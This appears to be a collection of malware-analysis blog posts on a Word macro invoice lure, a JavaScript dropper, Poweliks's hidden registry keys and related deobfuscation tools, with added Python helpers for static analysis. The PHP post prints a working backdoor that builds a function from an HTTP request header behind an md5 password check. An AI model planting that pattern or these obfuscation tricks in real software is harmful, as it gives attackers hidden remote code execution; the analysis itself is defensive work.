Malicious Word Macro Caught Using Sneaky Trick

There has been a slew of malicious Word documents attached to email purporting to be invoices, receipts, etc. This particular one caught my eye but I’m not sure if this is an old trick. I just haven’t seen this method used before and thought it was quite clever.

Here’s the email that had a zipped file attached. The zipped file contained a Word document. The email in poor English says, “Thank you for payment. Your invoice…is attached. Thank you for your business – we appreciate it very much.”

2015-03-06_01

Opening the Word document, the first thing you’ll notice is the security warning and, below it, a bunch of garbled text. A message above it says, “If you document have incorrect encoding – enable macro.”

2015-03-06_02

Clicking on the “Enable Content” button then reveals the invoice, making this (slightly) more believable and possibly enough to convince the unsuspecting recipient.

2015-03-06_03

Using OfficeMalScanner, the macros, specifically the one called “ThisDocument”, can be dumped to a file for analysis.

2015-03-06_04

Let’s try it with OleDump. It nicely shows the objects inside the document.

2015-03-06_05

We can also dump the ‘ThisDocument’ object.

2015-03-06_06

Looking at the macro, we can see a bunch of string concatenation going on and typical garbage in between legitimate VBA code.

2015-03-06_07

A quarter of the way in, there are some URLs to take note of.

2015-03-06_08

Basically the VBA macro builds a VBS script and writes it out.

2015-03-06_09
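Collapsing that kind of string concatenation by hand is tedious, so here is an added Python example (my own code, not from the post, OfficeMalScanner or OleDump) that reassembles `"lit" & Chr(n) & "lit"` chains from a dumped macro and pulls the URLs out without executing anything. The macro text is a constructed sample in the same style; the hosts in it are placeholders (`.invalid`), not the ones from the real document.

```python
import re

# Constructed sample of a dumped macro in the style described above.
# The hosts are placeholders (.invalid TLD), not the real URLs from the post.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim fso, f, cmd
    Dim junk1 As Integer
    junk1 = 42 'filler that does nothing
    cmd = "ht" & "tp://" & "exa" & "mple.invalid/" & "inv" & Chr(46) & "exe"
    Dim u2 As String
    u2 = "http://" & "stats.example.invalid/" & "count" & Chr(46) & "gif"
    Set fso = CreateObject("Scr" & "ipting.FileSystem" & "Object")
    Set f = fso.CreateTextFile("C:\Users\Public\run.vbs", True)
    f.WriteLine "Set x = CreateObject(" & Chr(34) & "WScript.Shell" & Chr(34) & ")"
End Sub
'''

LIT = r'"(?:[^"]|"")*"'          # VBA string literal; "" is an escaped quote
CHR = r'Chr\(\d+\)'              # Chr(n) call producing one character
# A chain is a literal or Chr() followed by any number of "& piece" terms.
# Bare identifiers are allowed as pieces so a variable in the middle does not
# break the chain; they are kept as <name> markers in the output.
CHAIN = re.compile(rf'(?:{LIT}|{CHR})(?:\s*&\s*(?:{LIT}|{CHR}|\w+))*', re.IGNORECASE)
PIECE = re.compile(r'"((?:[^"]|"")*)"|Chr\((\d+)\)', re.IGNORECASE)


def split_amp(expr):
    """Split a concatenation expression on '&' characters that are outside quotes."""
    parts, cur, in_quote = [], [], False
    for ch in expr:
        if ch == '"':
            in_quote = not in_quote
        if ch == '&' and not in_quote:
            parts.append(''.join(cur).strip())
            cur = []
        else:
            cur.append(ch)
    parts.append(''.join(cur).strip())
    return parts


def join_concat(expr):
    """Collapse "lit" & Chr(n) & var & ... into a single string."""
    out = []
    for part in split_amp(expr):
        m = PIECE.fullmatch(part)
        if m is None:
            out.append('<' + part + '>')          # unknown variable, keep a marker
        elif m.group(1) is not None:
            out.append(m.group(1).replace('""', '"'))
        else:
            out.append(chr(int(m.group(2))))
    return ''.join(out)


def reassemble_strings(vba):
    """Return every concatenation chain in the macro, collapsed, in source order."""
    return [join_concat(m.group(0))
            for line in vba.splitlines() for m in CHAIN.finditer(line)]


def extract_urls(vba):
    """Pull http(s) URLs out of the collapsed strings."""
    text = '\n'.join(reassemble_strings(vba))
    return re.findall(r'https?://[^\s"\'<>]+', text)


if __name__ == '__main__':
    for s in reassemble_strings(SAMPLE_VBA):
        print(repr(s))
    print('URLs:', extract_urls(SAMPLE_VBA))
```

The chain matcher works line by line and does not evaluate anything, so it is safe to run over a dump straight out of OfficeMalScanner or OleDump; a variable that is built up across several statements shows up as a `<name>` marker rather than being resolved, which is usually enough to tell you where to look next.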

Interestingly, this VBS calls up a PowerShell file. How vogue. It’s now very clear what it’s doing: downloading and executing a file from the Internet, then downloading an image for statistics and cleaning up.

2015-03-06_10

Let me download the file…

2015-03-06_11

And see what VirusTotal has to say…

2015-03-06_12

Regarding that image download, here’s what it is:

2015-03-06_13

The image’s download stats are in that red box. Not sure how many are victims vs security folks but that could be an impressive number.

2015-03-06_14

Going back to the macro, I wanted to find out how it “decrypted” the gibberish into text. Near the bottom, I see references to “findText” and “secondText” followed by some clean-up code.

2015-03-06_15

The findText subroutine shows that it looks for content between “<select></select>” tags then deletes it.

2015-03-06_16

The secondText routine looks for “<inbox></inbox>” tags and changes the contents’ font color to black.

2015-03-06_17

Ah! It’s not doing any decryption, it’s just some clever sleight of hand. The invoice text was there all along, hidden with white text. Here you can see the hidden content in green.

2015-03-06_18

Sneaky indeed.

Posted in Malicious Email, Malscript

Deobfuscating a Wicked-Looking Script

Bart Blaze, one of my security researcher friends passed along this PHP script to me. Let’s have a look.

2015-03-03_01

It looks like PHP ate some Perl and barfed it out. First thing I asked myself is, “does this even run?” It looks like a mess but it actually runs just fine. This script makes clever use of bitwise operators. For example…

$YzuZ = n ^ ')'; // this equates to 'G' (the bare word n is treated by PHP as the string "n", so 0x6E XOR 0x29 = 0x47)

To make this readable, I split everything by semi-colon (except when it’s between quotes). One gotcha is that this script embeds comments (# and /* */) so you have to look very closely and either leave it alone…

2015-03-03_02

Or fix it up…

2015-03-03_03
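The splitting step above is easy to get wrong by hand because of the quoted semicolons and the comments, so here is an added Python example (mine, not Bart’s script or any tool from the post) that splits PHP source on `;` while respecting quotes and both comment styles, and resolves the single-character XOR expressions the script is built from. The PHP snippet inside it is constructed in the same style, not the real script.

```python
import re

# Constructed PHP snippet in the style described above (not Bart's script):
# statements packed onto one line, a quoted ';', a '#' inside a string, and
# both comment styles sprinkled in.
SAMPLE_PHP = r"""$YzuZ=n^')';$q='a;b'; # trailing; comment
/* block; comment */ $w="x#y";$r=$YzuZ.$q; echo $r;"""


def split_statements(src):
    """Split PHP source on ';' while ignoring quoted strings and comments."""
    stmts, cur = [], []
    i, n, quote = 0, len(src), None
    while i < n:
        ch = src[i]
        if quote:                               # inside '...' or "..."
            cur.append(ch)
            if ch == '\\' and i + 1 < n:        # keep the escaped character as-is
                cur.append(src[i + 1])
                i += 2
                continue
            if ch == quote:
                quote = None
            i += 1
            continue
        if ch in ('"', "'"):
            quote = ch
            cur.append(ch)
            i += 1
            continue
        if ch == '#' or src.startswith('//', i):   # line comment: drop to end of line
            j = src.find('\n', i)
            i = n if j == -1 else j + 1
            continue
        if src.startswith('/*', i):                # block comment: drop to '*/'
            j = src.find('*/', i + 2)
            i = n if j == -1 else j + 2
            continue
        if ch == ';':
            s = ''.join(cur).strip()
            if s:
                stmts.append(s)
            cur = []
            i += 1
            continue
        cur.append(ch)
        i += 1
    tail = ''.join(cur).strip()
    if tail:
        stmts.append(tail)
    return stmts


def xor_strings(a, b):
    """PHP's 'str ^ str': XOR byte by byte, truncated to the shorter operand."""
    return ''.join(chr(ord(x) ^ ord(y)) for x, y in zip(a, b))


BARE_XOR = re.compile(r"^(\$\w+)\s*=\s*('?)(.)\2\s*\^\s*('?)(.)\4$")


def eval_bare_xor(stmt):
    """Resolve a statement of the form $v = X ^ 'Y' where X and Y are single
    characters. A bare word such as n is what PHP 5 treats as the string "n"
    (with a notice), which is exactly what the script relies on."""
    m = BARE_XOR.match(stmt)
    if not m:
        return None
    return m.group(1), xor_strings(m.group(3), m.group(5))


if __name__ == '__main__':
    for s in split_statements(SAMPLE_PHP):
        print(s, '   ->', eval_bare_xor(s))
```

Running it prints one statement per line with the resolved value next to the XOR assignments, which is the same “echo the important variables” idea from the post, done without executing the suspect code.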

After I cleaned it up, I noticed that the script boils down to the last two lines. So I just echo out each of the important variables:

2015-03-03_04

When the script is executed, I get the following values:

2015-03-03_05

Now I just replace the variable names with the corresponding values to get the final result. This creates a function whose body is passed in via an HTTP request header (probably something like ‘preg_replace’), which turns this into a well-hidden backdoor.

// the function body arrives in the HTTP_X_UP_CALLING_LINE_ID request header; the md5 check on HTTP_A gates it
if (md5(getenv('HTTP_A')) == '5d15db53a91790e913dc4e05a1319c42') $bIywY = create_function('$a, $b, $c', getenv('HTTP_X_UP_CALLING_LINE_ID'));
$bIywY('x1o6Vm2', 'WFrkAj9', 'QcFS0u');

Be sure you check out Bart’s blog to learn more about this particular script.

Posted in Malscript

Revelo Updated

A colleague of mine received the following email in their Gmail in-box and wondered how it got past their filters and what it does.

2015-02-15_01

What almost tricked him was the fact that it called out his name. Only after looking at the originating email address did it make him pause. Good thing they didn’t spoof that. Let’s have a look at the attachment.

2015-02-15_02

It’s a JavaScript file. Malicious scripts are hard to detect because they are so easy to modify and customize. By the looks of this, it concatenates a value to the variable ‘a’ then jumps to another function. It keeps doing this until the very end, then evals it. The problem is trying to find the “end”. Can you find it?

2015-02-15_03

First let’s deobfuscate this manually. You will need to find the end of all the concatenation it’s doing, then replace the eval with alert. After spending about a minute eyeballing the script, I gave up. I did a search for “(a)” and found it in the middle.

2015-02-15_04

Just change that to “alert(a)” and execute the file with your browser and you’ll see what it does.

2015-02-15_05

An easier way is to append a short script at the end, like this. When you run the script, you get the same result as above.

2015-02-15_06

The deobfuscated script, by the way, makes an AJAX call to a website at tripenjoy.com, downloads a unique file which poses as a JPEG image, renames it as an executable, then runs it.

2015-02-15_07

The downloaded file is definitely not a JPEG image.

2015-02-15_08

The payload keeps changing, and the latest one I got was nearly FUD according to VirusTotal.

2015-02-15_09

I’ve been meaning to update Revelo and this script prompted me to do it. The latest version lets you deobfuscate these types of scripts more quickly, using the same method we used above.

Run Revelo and paste in the Javascript (or open the file). Revelo needs the “<script></script>” tags so just click on Options > Add Script Tags and it will do so automatically.

2015-02-15_10

Choose the “Append Variable to End” method, type in “a” (the name of the variable we want to view) and click on Execute. Done!

2015-02-15_11

The second method I added is called “Intercept Return and Variable”. It intercepts a user-specified variable that’s being returned from a function to the caller.

Here’s an example. The script below passes a series of numbers to “CRYPT.obfuscate” then on to a “CRYPT.decode” function. The decode function decodes the values, converts them to a string, then returns the deobfuscated result, which has been highlighted in red.

2015-02-15_12

All you need to do is select the new method and enter “return output” and click on Execute. Done!

2015-02-15_13
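Both of the methods described above (find the end of the concatenation chain and dump ‘a’, and intercept a value as it is returned) come down to small source rewrites plus, for the first one, knowing where the chain ends. Here is an added Python example (my code, not Revelo’s) that does the rewrites as text transformations and, for the hop-to-hop pattern in the attachment, follows the function chain statically so the value of ‘a’ is recovered without running the script in a browser at all. The JavaScript inside is a constructed sample in that style with a harmless `alert()` as the payload; the `prompt(1, …)` form mirrors Revelo’s “Send Results to Prompt” option.

```python
import re

# Constructed JavaScript sample modelled on the pattern described above (not the
# real attachment): each function appends a piece to "a" and jumps to the next,
# the last one evals. The payload here is a harmless alert().
SAMPLE_JS = '''
var a = "";
function k3() { a += "ert('dec"; q7(); }
function q7() { a += "oded')"; eval(a); }
function z1() { a += "al"; k3(); }
function m2() { a = a + "junk"; }   // never called
z1();
'''

STRING = r'"(?:[^"\\]|\\.)*"|\'(?:[^\'\\]|\\.)*\''
FUNC = re.compile(r'function\s+(\w+)\s*\(\s*\)\s*\{(.*?)\}', re.S)   # flat bodies only
CALL = re.compile(r'\b(\w+)\s*\(\s*\)')                              # zero-argument call


def unquote(lit):
    """Strip the quotes from a JS string literal and undo the common escapes."""
    return (lit[1:-1].replace('\\"', '"').replace("\\'", "'")
            .replace('\\n', '\n').replace('\\\\', '\\'))


def walk(src, var='a', max_hops=10000):
    """Statically follow the call chain from the top-level entry point,
    collecting every `var += "..."` / `var = var + "..."` along the way.
    Returns (reassembled value, list of functions visited)."""
    v = re.escape(var)
    append = re.compile(rf'(?<!\w){v}\s*(?:\+=|=\s*{v}\s*\+)\s*({STRING})')
    funcs = dict(FUNC.findall(src))
    top = FUNC.sub('', src)                      # whatever is left is top-level code
    entry = CALL.search(top)
    name = entry.group(1) if entry else None
    value, trail = '', []
    while name in funcs and len(trail) < max_hops:
        trail.append(name)
        body = funcs[name]
        for m in append.finditer(body):
            value += unquote(m.group(1))
        body_no_str = re.sub(STRING, '""', body)  # do not follow calls hidden in literals
        nxt = CALL.search(body_no_str)
        name = nxt.group(1) if nxt else None
    return value, trail


def send_to_prompt(src):
    """The "replace eval" trick: show the argument instead of running it."""
    return re.sub(r'\beval\s*\(', 'prompt(1, ', src)


def append_variable(src, var='a'):
    """The "Append Variable to End" method: dump var once the script has run.
    eval is neutralised first so the reassembled payload is displayed, not executed."""
    return send_to_prompt(src) + f'\nprompt(1, {var});\n'


def intercept_return(src, expr='output'):
    """The "Intercept Return and Variable" method: show a value as it is returned."""
    pat = r'\breturn\s+' + re.escape(expr) + r'\s*;'
    return re.sub(pat, f'prompt(1, {expr}); return {expr};', src)


if __name__ == '__main__':
    value, trail = walk(SAMPLE_JS)
    print(' -> '.join(trail), '=>', repr(value))
    print(append_variable(SAMPLE_JS))
```

The static walker only understands the flat “append and jump” shape (no nested braces, no arguments, no branching), which is deliberate: if it stops early or returns an empty value, that is a signal the script uses something else and the instrumented copy from `append_variable` or `intercept_return` should be run in an isolated browser instead.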

I also added three more options to the menu:

2015-02-15_14

    * “Send Results to Prompt when Possible” – will try to display the results in this way: prompt(1,variable).
    * “Use Double Quote” – when trying various methods to deobfuscate a script, inserting single quotes into the script may mess things up so if this option is selected, double quotes will be used instead.
    * “Convert Object to Text” – simply appends “.text” to objects in order to convert them to text where appropriate.

The latest version of Revelo is available on the Tools page.

Posted in Malicious Email, Malscript, Tools

Wild Wild West – 12/2014

Added the following packs:

Null Hole
“Hanjuan EK”
“Archie EK”
“Astrum EK”
“SedKit”
“SPL2 Pack”

Special thanks to Kafeine for his valuable input.

wildwildwest_1214

Posted in Exploit Packs

Registry Dumper – Find and Dump Hidden Registry Keys

The cybercriminals behind Poweliks implemented two clever techniques in their malware. The first was leveraging rundll32.dll to execute Javascript and the second was using a method to hide/protect their registry keys. I’ll be focusing on the second method.

The technique of hiding/protecting registry keys using a non-ASCII character goes back more than a decade. It’s remarkable that, after all these years, it still works on the latest Windows platform.

Here we see the built-in Windows Registry Editor choke on the hidden/protected key after the computer has been infected with Poweliks.

2014-12-06_01

Clicking past the error dialog, you should see something like this. This default key is exposed and fully downloadable/viewable. However, there’s another key that contains the “trigger” that’s not visible.

2014-12-06_02

If we need to research what this particular malware is doing, we ought to find out what else is hiding there. For that we need to find a tool to help us view these hidden registry keys.

With online (live-system) registry viewers/editors, you can get mixed results. Some seem to work well but lack some basic functionality like exporting keys as text. Others get confused and display the wrong key.

2014-12-06_03

2014-12-06_04

2014-12-06_05

Offline registry viewers/editors fare much better and offer consistent results. However, you will need to log into a separate account on the computer and use this tool. Or you have to copy the registry off of the infected machine and view it on a computer with the tool installed.

2014-12-06_06

I prefer to do an initial triage on the live machine and get to the data as quickly as possible. Since I couldn’t find a portable, online tool that had the features I wanted, I figured I would try my hand at creating one. The tool is called Registry Dumper and uses a DLL, written by Hoang Khanh Nguyen, that interacts with the registry via the NT native APIs.

2014-12-06_07

This tool allows you to scan for null characters in a given path. It will iterate through the path to find all the keys with nulls in them.

2014-12-06_08

If you click on the “Show in Hex” checkbox, you can see the key names in hex. Here you will notice that the second entry’s name is “010001”, which is equivalent to 0x01 0x00 0x01. This is impossible to view, edit, or delete using the Windows Registry Editor.

2014-12-06_09

From here you can copy/paste the path over to the left side and dump the keys to a text file.

2014-12-06_10

Here’s the text file containing all the key values in the given path.

2014-12-06_11

With this tool you can create hidden keys for testing purposes. And if you wanted to delete that impossible-to-remove key, you can use this tool by entering “[x01][null][x01]” as the key name.

2014-12-06_12
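To make the “010001” hex view, the `[x01][null][x01]` notation and the reason Regedit chokes concrete, here is an added Python example (mine, not Registry Dumper’s code) that parses that notation into a real name, renders names the way the “Show in Hex” checkbox does, and flags names containing a NUL together with what a null-terminated Win32 caller would see of them. The key names are a constructed list, not taken from an infected machine, and the `[xNN]`/`[null]` token syntax is assumed from the single example in the post.

```python
import re

# Constructed list of key names as a live scanner using the NT native APIs would
# return them (those hand back counted UNICODE_STRINGs, so embedded nulls
# survive). Placeholder names, not taken from a real Poweliks infection.
SAMPLE_KEY_NAMES = [
    "(Default)",
    "a",
    "\x01\x00\x01",        # the "010001" key from the post
    "Run\x00Hidden",       # a null buried in an otherwise normal name
]

TOKEN = re.compile(r'\[(null|x[0-9a-fA-F]{2})\]')


def parse_key_name(spec):
    """Turn the post's "[x01][null][x01]" notation into a real key name.
    Token syntax ([null] and [xNN]) is assumed from that one example."""
    out, pos = [], 0
    for m in TOKEN.finditer(spec):
        out.append(spec[pos:m.start()])                      # literal text between tokens
        tok = m.group(1)
        out.append('\x00' if tok == 'null' else chr(int(tok[1:], 16)))
        pos = m.end()
    out.append(spec[pos:])
    return ''.join(out)


def to_hex(name):
    """The "Show in Hex" view: each character as two hex digits ("010001")."""
    return ''.join(f'{ord(c):02x}' for c in name)


def win32_view(name):
    """What a null-terminated (Win32) API sees: everything up to the first NUL."""
    return name.split('\x00', 1)[0]


def find_hidden(names):
    """Flag names containing a NUL; return (hex view, what Regedit would see)."""
    return [(to_hex(n), win32_view(n)) for n in names if '\x00' in n]


if __name__ == '__main__':
    for hx, visible in find_hidden(SAMPLE_KEY_NAMES):
        print(f'hidden key {hx}: Win32 callers see {visible!r}')
    print(to_hex(parse_key_name('[x01][null][x01]')))
```

The `win32_view` column is the whole trick in one line: a name that the kernel stores as three characters is handed to a C-string API that stops at the first zero, so the Registry Editor is asked to open a key that, from its point of view, does not exist.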

The obfuscated data you see there is the result of running it through Microsoft Script Encoder. To deobfuscate it, you can use an online decoder or download a VBS decoder. A fellow by the name of Lewis E. Moten III wrote a decoder program. I repackaged his function in the following tool.

2014-12-06_13

Here is the decoded version. You will notice that I didn’t have to strip away everything but the encoded string. The decoder program looks for the start and end markers of the encoded text and replaces it with the decoded result.

2014-12-06_14

Just recently, a newer variant of Poweliks was found. It uses a different registry hiding technique based on user permissions. You can read about it here.

If you use this tool to access one of these keys, you will get an error message saying that the key doesn’t exist. It does exist; the account running the tool just doesn’t have the rights to view it.

2014-12-06_15

Here’s the permission properties of the key using the Windows Registry Editor. Notice that the current user has no read permissions.

2014-12-06_16

You can still use this tool to dump the keys, but you first need to grant permission to the user account that’s running the tool. Just click on the Set Permission to User button and the permissions are changed to grant the current user those rights.

2014-12-06_17

Now you can access the key:

2014-12-06_18

Here is the dump of the keys:

2014-12-06_19

And the decoded string:

2014-12-06_20

By the way, that JavaScript in the “(Default)” key can be deobfuscated easily using Converter. You will see that the values in between the quotes are shifted over by one character (e.g. the word hello = ifmmp). Just enter the value “-1” and click on the SHIFTx button (or click once on the minus button on the right).

2014-12-06_21

You can download both tools here.

Posted in Malscript, Tools